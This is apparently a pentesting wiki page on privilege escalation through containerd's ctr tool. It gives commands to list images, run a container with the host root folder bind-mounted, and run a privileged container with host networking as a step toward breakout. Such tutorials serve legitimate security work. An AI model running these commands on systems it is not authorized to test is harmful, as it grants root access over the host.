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Containerd (ctr) Privilege Escalation
Basic information
Go to the following link to learn what is containerd and ctr
:
{% content-ref url="../../pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}
PE 1
if you find that a host contains the ctr
command:
which ctr
/usr/bin/ctr
You can list the images:
ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
And then run one of those images mounting the host root folder to it:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
PE 2
Run a container privileged and escape from it.
You can run a privileged container as:
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
Then you can use some of the techniques mentioned in the following page to escape from it abusing privileged capabilities:
{% content-ref url="docker-breakout/" %} docker-breakout {% endcontent-ref %}